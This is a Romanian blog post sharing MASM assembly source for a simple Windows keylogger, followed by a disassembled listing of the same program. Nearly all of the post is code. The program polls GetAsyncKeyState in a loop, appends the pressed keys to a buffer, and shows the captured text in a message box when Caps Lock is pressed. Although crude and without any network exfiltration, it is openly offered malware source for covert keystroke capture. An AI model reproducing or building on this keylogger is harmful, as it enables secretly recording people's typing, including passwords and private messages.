Keylogger Asm

This article has been written before more than 24months, information might old.

Am rescris metoda cu GetAsyncKeyState in masm , ma rog e mai necizelata dar merge :
Cod :


.Const

.Data?

sh DD ?
cp DD ?
Number DD ?

index DD ?
tindex DD ?
TempC DB ?

.Data

WprType DB "%lc", 0
Keys DB 512 Dup(0)

.Code
start:
Mov Keys, 0
rr:
Invoke Sleep, 60
Mov index, 0
Mov index, 8
ForLoop:
;test
Invoke GetAsyncKeyState, 14H
.If Eax
Invoke MessageBox, 0, Addr Keys, 0, 0
Invoke ExitProcess, NULL
.EndIf
;test
Invoke GetAsyncKeyState, index
.If Eax == -32767 ;
Invoke GetAsyncKeyState, 20H
.If Eax
Invoke wsprintf, Addr TempC, Addr WprType, 20H ; Space ajunge ...
Invoke lstrcat, Addr Keys, Addr TempC
.ElseIf (index >= 60) && (index < = 90)
Mov sh, 0
Mov cp, 0
Invoke GetAsyncKeyState, 14H ;
Mov sh, Eax
Invoke GetAsyncKeyState, 10H ;
Mov cp, Eax
.If cp != 0 || sh != 0 ;
Xor Eax, Eax
Mov tindex, Eax
Mov Eax, index
Mov tindex, Eax
Invoke wsprintf, Addr TempC, Addr WprType, tindex
Invoke lstrcat, Addr Keys, Addr TempC
.Else
Xor Eax, Eax
Mov tindex, Eax
Mov Eax, index
Mov tindex, Eax
Add tindex, 32
Invoke wsprintf, Addr TempC, Addr WprType, tindex
Invoke lstrcat, Addr Keys, Addr TempC
.EndIf

.If index == 190
Jmp rr
.Else
Inc index
Jmp ForLoop
.EndIf

.EndIf
.EndIf

.If index == 190
Jmp rr
.Else
Inc index
Jmp ForLoop
.EndIf

Invoke ExitProcess, NULL
End start

In „raw asm” ar arata cam asa :

;< = Procedure Start

        mov byte ptr [keys],0

@Project1_00401007:

        push 03ch
        call _sleep@4                        ; JMP to kernel32.Sleep
        mov dword ptr [index],0
        mov dword ptr [index],8

@Project1_00401022:

        push 014h
        call _getasynckeystate@4             ; JMP to user32.GetAsyncKeyState
        or eax,eax
        je @Project1_00401044
        push 0
        push 0
        push offset keys
        push 0
        call _messageboxa@16                 ; JMP to user32.MessageBoxA
        push 0
        call _exitprocess@4                  ; JMP to kernel32.ExitProcess

@Project1_00401044:

        push dword ptr [index]
        call _getasynckeystate@4             ; JMP to user32.GetAsyncKeyState
        cmp eax,0ffff8001h
        jnz @Project1_0040117c
        push 020h
        call _getasynckeystate@4             ; JMP to user32.GetAsyncKeyState
        or eax,eax
        je @Project1_0040108d
        push 020h
        push offset wprtype                  ; ASCII "%lc"
        push offset tempc
        call _wsprintfa                      ; JMP to user32.wsprintfA
        add esp,0ch
        push offset tempc
        push offset keys
        call _lstrcata@8                     ; JMP to kernel32.lstrcatA
        jmp @Project1_0040117c

@Project1_0040108d:

        cmp dword ptr [index],03ch
        jb @Project1_0040117c
        cmp dword ptr [index],05ah
        ja @Project1_0040117c
        mov dword ptr [sh],0
        mov dword ptr [cp],0
        push 014h
        call _getasynckeystate@4             ; JMP to user32.GetAsyncKeyState
        mov [sh],eax
        push 010h
        call _getasynckeystate@4             ; JMP to user32.GetAsyncKeyState
        mov [cp],eax
        cmp dword ptr [cp],0
        jnz @Project1_004010e5
        cmp dword ptr [sh],0
        je @Project1_0040111f

@Project1_004010e5:

        xor eax,eax
        mov [tindex],eax
        mov eax,[index]
        mov [tindex],eax
        push dword ptr [tindex]
        push offset wprtype                  ; ASCII "%lc"
        push offset tempc
        call _wsprintfa                      ; JMP to user32.wsprintfA
        add esp,0ch
        push offset tempc
        push offset keys
        call _lstrcata@8                     ; JMP to kernel32.lstrcatA
        jmp @Project1_0040115e

@Project1_0040111f:

        xor eax,eax
        mov [tindex],eax
        mov eax,[index]
        mov [tindex],eax
        add dword ptr [tindex],020h
        push dword ptr [tindex]
        push offset wprtype                  ; ASCII "%lc"
        push offset tempc
        call _wsprintfa                      ; JMP to user32.wsprintfA
        add esp,0ch
        push offset tempc
        push offset keys
        call _lstrcata@8                     ; JMP to kernel32.lstrcatA

@Project1_0040115e:

        cmp dword ptr [index],0beh
        jnz @Project1_00401171
        jmp @Project1_00401007
        jmp @Project1_0040117c

@Project1_00401171:

        inc dword ptr [index]
        jmp @Project1_00401022

@Project1_0040117c:

        cmp dword ptr [index],0beh
        jnz @Project1_0040118f
        jmp @Project1_00401007               ;<= Procedure End

        jmp @Project1_0040119a

@Project1_0040118f:                          ;<= Procedure Start

        inc dword ptr [index]
        jmp @Project1_00401022               ;<= Procedure End

@Project1_0040119a:                          ;<= Procedure Start

        push 0
        call _exitprocess@4                  ;<= Procedure End ; JMP to kernel32.ExitProcess

        int3
        jmp [<&kernel32.exitprocess>]        ; kernel32.ExitProcess

_Sleep@4:

        jmp [< &kernel32.sleep>]              ; kernel32.Sleep

_lstrcatA@8:

        jmp [< &kernel32.lstrcata>]           ; kernel32.lstrcatA

_wsprintfA:

        jmp [< &user32.wsprintfa>]            ; user32.wsprintfA

_GetAsyncKeyState@4:

        jmp [< &user32.getasynckeystate>]     ; user32.GetAsyncKeyState

_MessageBoxA@16:

        jmp [< &user32.messageboxa>]          ; user32.MessageBoxA

Spatiu alocat pentru memorie e 3821 k maxim .

Share the joy

One Response

  1. ceostoy februarie 26, 2010

Leave a Reply